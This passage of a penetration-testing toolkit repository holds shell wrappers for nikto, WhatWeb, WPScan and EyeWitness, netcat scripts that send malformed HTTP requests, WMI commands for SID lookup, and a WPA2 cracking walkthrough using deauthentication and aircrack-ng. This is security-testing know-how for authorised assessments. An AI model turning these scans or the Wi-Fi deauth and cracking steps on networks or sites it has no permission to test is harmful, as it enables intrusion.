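# The URL is quoted so the three arguments always form a single argument.
# NOTE(review): $2 is also part of the output file name, so a value that
# contains "/" points the PNG outside the current directory or makes the
# write fail.
if [ "$#" -eq 3 ]; then
    wkhtmltoimage --format png "$1://$2:$3/" "$1_$2_$3_screenshot.png"
else
    echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port."
fi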
30 |
--------------------------------------------------------------------------------
/web/lists/big.list:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/maldevel/PenTestKit/45ab5a4e2f5ad007b5ac8832d35d03edb5a2cc27/web/lists/big.list
--------------------------------------------------------------------------------
/web/lists/common-content-types.list:
--------------------------------------------------------------------------------
1 | application/javascript
2 | application/json
3 | application/x-www-form-urlencoded
4 | application/pdf
5 | application/xml
6 | application/zip
7 | audio/mpeg
8 | audio/vorbis
9 | multipart/form-data
10 | text/css
11 | text/html
12 | text/plain
13 | image/png
14 | image/jpeg
15 | image/gif
16 |
--------------------------------------------------------------------------------
/web/nikto-scan-proxy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
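# Run a nikto scan of the target through a proxy; nikto writes an HTML
# report and the console output is copied to a text file.
#   $1  protocol scheme (http or https)
#   $2  target IP address or hostname
#   $3  target port
#   $4  proxy server
# Every expansion is quoted so each value reaches nikto as one argument and
# the report path is not split or glob-expanded.
if [ "$#" -eq 4 ]; then
    nikto -ask=no -h "$1://$2:$3" -output "$1_$2_$3_nikto.html" -useproxy "$4" 2>&1 | tee "$1_$2_$3_nikto.txt"
else
    echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port and the proxy server."
fi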
30 |
--------------------------------------------------------------------------------
/web/nikto-scan-useragent-proxy.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
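# Run a nikto scan of the target with a custom user agent through a proxy;
# nikto writes an HTML report and the console output is copied to a text
# file.
#   $1  protocol scheme (http or https)
#   $2  target IP address or hostname
#   $3  target port
#   $4  user agent string
#   $5  proxy server
# The user agent is quoted because real user agent strings contain spaces;
# unquoted, only the first word reached -useragent and the remaining words
# became stray nikto arguments.
if [ "$#" -eq 5 ]; then
    nikto -ask=no -h "$1://$2:$3" -output "$1_$2_$3_nikto.html" -useragent "$4" -useproxy "$5" 2>&1 | tee "$1_$2_$3_nikto.txt"
else
    echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port, the user agent string and the proxy server."
fi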
30 |
--------------------------------------------------------------------------------
/web/nikto-scan-useragent.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
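# Run a nikto scan of the target with a custom user agent; nikto writes an
# HTML report and the console output is copied to a text file.
#   $1  protocol scheme (http or https)
#   $2  target IP address or hostname
#   $3  target port
#   $4  user agent string
# The user agent is quoted because real user agent strings contain spaces;
# unquoted, only the first word reached -useragent and the remaining words
# became stray nikto arguments.
if [ "$#" -eq 4 ]; then
    nikto -ask=no -h "$1://$2:$3" -output "$1_$2_$3_nikto.html" -useragent "$4" 2>&1 | tee "$1_$2_$3_nikto.txt"
else
    echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port and the user agent string."
fi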
30 |
--------------------------------------------------------------------------------
/web/nikto-scan.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
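# Run a Nikto scan against <scheme>://<host>:<port>.
#
# Arguments:
#   $1  protocol scheme (http or https)
#   $2  target IP address or hostname
#   $3  target port
#
# Output (current directory): the HTML report written by nikto via -output and
# a text copy of nikto's stdout/stderr written by tee.
if [ "$#" -eq 3 ]; then
    # Both report names are derived from the arguments; this assumes they
    # contain no '/' or whitespace — TODO confirm against callers.
    report_base="${1}_${2}_${3}_nikto"

    # Quoted so the target and the report path each stay a single argument and
    # are not subject to word splitting or pathname expansion.
    nikto -ask=no -h "$1://$2:$3" -output "${report_base}.html" 2>&1 | tee "${report_base}.txt"
else
    echo "Please provide the target protocol scheme (http or https), target IP address or hostname and the target port."
fi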
30 |
--------------------------------------------------------------------------------
/web/nikto.md:
--------------------------------------------------------------------------------
1 | ## Nikto
2 |
3 | ### Scanning an HTTPS target using an HTTP proxy
4 |
5 | * Edit nikto.conf
6 |
7 | ```
8 | nano /etc/nikto.conf
9 | ```
10 |
11 | * Change line ```LW_SSL_ENGINE=auto``` to ```LW_SSL_ENGINE=SSLeay```
12 |
13 | ```
14 | nikto -host example.com -port 443 -ssl -output nikto_https_report.html -useproxy http://127.0.0.1:8080
15 | ```
16 |
--------------------------------------------------------------------------------
/web/robots-ssl.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
# Download robots.txt from the target over HTTPS into the current directory.
#
# Arguments:
#   $1  target host (inserted between "https://" and "/robots.txt")
#
# --no-check-certificate switches off wget's TLS certificate validation, so the
# download also succeeds against self-signed or mismatched certificates; the
# identity of the answering server is not verified for this request.
case $# in
    1)
        wget "https://$1/robots.txt" --no-check-certificate
        ;;
    *)
        echo "Please provide target host."
        ;;
esac
30 |
--------------------------------------------------------------------------------
/web/robots.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
# Download robots.txt from the target over plain HTTP into the current
# directory.
#
# Arguments:
#   $1  target host (inserted between "http://" and "/robots.txt")
#
# The request is unencrypted, so the response is neither confidential nor
# integrity-protected in transit.
if [ $# -ne 1 ]; then
    echo "Please provide target host."
else
    wget "http://$1/robots.txt"
fi
30 |
--------------------------------------------------------------------------------
/web/screenshot.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
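# Run EyeWitness in web mode over a list of URLs.
#
# Arguments:
#   $1  path to a file containing the target URLs
#
# The interpreter (python2) and the install location
# (/opt/EyeWitness/EyeWitness.py) are hard-coded; the script fails if either is
# missing on the host.
if [ "$#" -eq 1 ]; then
    # Quoted so a path containing spaces or glob characters is passed to -f as
    # one argument.
    python2 /opt/EyeWitness/EyeWitness.py --web -f "$1"
else
    echo "Please provide a file containing target urls."
fi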
30 |
--------------------------------------------------------------------------------
/web/web-app-framework.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
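# Fingerprint the technologies behind a URL with WhatWeb.
#
# Arguments:
#   $1  target URL
#
# WhatWeb runs verbosely (-v) at aggression level 3 (-a 3) with a fixed
# desktop-browser User-Agent, and writes its verbose log to
# whatweb_results.txt in the current directory.
if [ "$#" -eq 1 ]; then
    # "$1" is quoted: URLs routinely contain '?', '*' or '&', and an unquoted
    # expansion would be subject to pathname expansion and word splitting
    # before whatweb sees it.
    whatweb -v -a 3 -U='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36' --log-verbose=whatweb_results.txt "$1"
else
    echo "Please provide target url."
fi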
30 |
--------------------------------------------------------------------------------
/web/web-headers-malformed-2.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
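# Send a single request line with an invalid protocol token ("JUNK/1.0") to a
# TCP service and print whatever the server answers.
#
# Arguments:
#   $1  target IP
#   $2  target port
#
# NOTE(review): presumably used to observe how the server reports a malformed
# request (status line, headers, error body) — confirm the intended use.
if [ "$#" -eq 2 ]; then
    # echo -e expands the \r\n sequences and appends one final newline; nc
    # sends those bytes as-is and writes the reply to stdout.
    # Host and port are quoted so each reaches nc as exactly one argument.
    echo -e 'GET / JUNK/1.0\r\n\r\n' | nc "$1" "$2"
else
    echo "Please provide the target IP and port."
fi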
30 |
--------------------------------------------------------------------------------
/web/web-headers-malformed.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
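# Send a single request line that names protocol version "HTTP/3.0" to a TCP
# service and print whatever the server answers.
#
# Arguments:
#   $1  target IP
#   $2  target port
#
# "HTTP/3.0" is not a version a server expects on a plain-text request line
# over TCP, so the reply shows how the server handles an unsupported version.
# NOTE(review): presumably that reply is what the script is for — confirm.
if [ "$#" -eq 2 ]; then
    # echo -e expands the \r\n sequences and appends one final newline; nc
    # sends those bytes as-is and writes the reply to stdout.
    # Host and port are quoted so each reaches nc as exactly one argument.
    echo -e 'GET / HTTP/3.0\r\n\r\n' | nc "$1" "$2"
else
    echo "Please provide the target IP and port."
fi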
30 |
--------------------------------------------------------------------------------
/web/web-headers-null.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
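# Send a single request line whose path is the percent-encoded NUL byte
# ("/%00") and which carries no protocol version, then print whatever the
# server answers.
#
# Arguments:
#   $1  target IP
#   $2  target port
#
# NOTE(review): presumably used to observe how the server reports this request
# (status line, headers, error body) — confirm the intended use.
if [ "$#" -eq 2 ]; then
    # echo -e expands the \r\n sequences and appends one final newline; nc
    # sends those bytes as-is and writes the reply to stdout.
    # Host and port are quoted so each reaches nc as exactly one argument.
    echo -e 'GET /%00\r\n\r\n' | nc "$1" "$2"
else
    echo "Please provide the target IP and port."
fi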
30 |
--------------------------------------------------------------------------------
/web/web-recon.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
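# Fingerprint the technologies behind <scheme>://<server>:<port> with WhatWeb
# and keep a text copy of the output.
#
# Arguments:
#   $1  protocol scheme (http or https)
#   $2  target server (IP address, hostname or URI, per the usage text)
#   $3  port
#
# WhatWeb runs verbosely (-v) at aggression level 3 (-a 3) with colour and
# error output disabled; stdout and stderr are copied by tee to
# <scheme>_<server>_<port>_whatweb.txt in the current directory.
#
# NOTE(review): the usage text allows a URI for $2, but the port is appended
# after it, so a value with a path yields "<host>/<path>:<port>" — confirm the
# intended input.
if [ "$#" -eq 3 ]; then
    log_file="${1}_${2}_${3}_whatweb.txt"
    # A '/' in the server argument would make tee target a sub-directory path
    # instead of a file in the current directory; flatten it to '_'.
    log_file="${log_file//\//_}"

    # The target is quoted so it is not word-split or glob-expanded.
    whatweb --color=never --no-errors -a 3 -v "$1://$2:$3" 2>&1 | tee "$log_file"
else
    echo "Please provide the protocol scheme (http or https), the target server (IP address, hostname or URI) and the port."
fi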
30 |
--------------------------------------------------------------------------------
/web/wordpress-scan.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see <https://www.gnu.org/licenses/>.
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
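# Run WPScan against a WordPress URL and keep a text copy of the output.
#
# Arguments:
#   $1  target URL
#
# The log file name is derived from the URL: runs of '/' and runs of '.' become
# a single '_', and ':' is removed. Constructed example:
#   https://example.com  ->  wpscan_https_example_com.txt
if [ "$#" -eq 1 ]; then
    # Use a private lowercase variable instead of LOGNAME: LOGNAME is the
    # standard login-name environment variable, and assigning to it changes the
    # value inherited by wpscan and tee.
    log_name="wpscan_$1"
    log_name=$(printf '%s\n' "$log_name" | sed -r -e 's/[/]+/_/g' -e 's/[.]+/_/g' -e 's/[:]+//g')
    log_name="$log_name.txt"

    # URL and log path are quoted so query strings, spaces or glob characters
    # do not split or expand into extra arguments.
    wpscan -v --url "$1" --update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "$log_name"
else
    echo "Please provide the URL."
fi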
33 |
--------------------------------------------------------------------------------
/wifi/wifi.md:
--------------------------------------------------------------------------------
1 | ## WiFi Notes
2 |
3 | ### Debian
4 |
5 | * Add a "non-free" component to /etc/apt/sources.list
6 |
7 | ```bash
8 | sudo apt-get install firmware-atheros
9 | ```
10 |
11 | [ath9k_htc](https://wiki.debian.org/ath9k_htc)
12 |
--------------------------------------------------------------------------------
/wifi/wpa2.md:
--------------------------------------------------------------------------------
1 | ## WPA2 WiFi Hacking
2 |
3 | ### Enable monitor mode on wireless interface
4 |
5 | **List wireless interfaces supporting monitor mode**
6 |
7 | ```bash
8 | airmon-ng
9 | ```
10 |
11 | **Enable monitor mode**
12 |
13 | ```bash
14 | airmon-ng start wlan0
15 | ```
16 |
17 | ### Scan for WiFi networks
18 |
19 | ```bash
20 | airodump-ng wlan0mon
21 | ```
22 |
23 | ### Packet Capture
24 |
25 | ```bash
26 | airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ wlan0mon
27 | ```
28 |
29 | ### Inject packets/Capture Handshake
30 |
31 | ```bash
32 | aireplay-ng -0 10 -a [router bssid] -c [client bssid] wlan0mon
33 | ```
34 |
35 | ### Cracking
36 |
37 | ```bash
38 | aircrack-ng -a2 -b [router bssid] -w /path/to/wordlist /root/Desktop/*.cap
39 | ```
40 |
41 |
--------------------------------------------------------------------------------
/windows/wmi.md:
--------------------------------------------------------------------------------
1 | ## Windows Management Instrumentation
2 |
3 | ### Get SID of a local user
4 |
5 | ```
6 | wmic useraccount where name='username' get sid
7 | ```
8 |
9 |
10 | ### Get SID for the currently logged-in user
11 |
12 | ```
13 | wmic useraccount where name='%username%' get sid
14 | ```
15 |
16 | ### Get SID for the currently logged-in domain user
17 |
18 | ```
19 | whoami /user
20 | ```
21 |
22 | ### Get SID for the local administrator of the computer
23 |
24 | ```
25 | wmic useraccount where (name='administrator' and domain='%computername%') get name,sid
26 | ```
27 |
28 | ### Get SID for the domain administrator
29 |
30 | ```
31 | wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
32 | ```
33 |
34 | ### Find username from a SID
35 |
36 | ```
37 | wmic useraccount where sid='S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxx-xxxx' get name
38 | ```
39 |
40 |
--------------------------------------------------------------------------------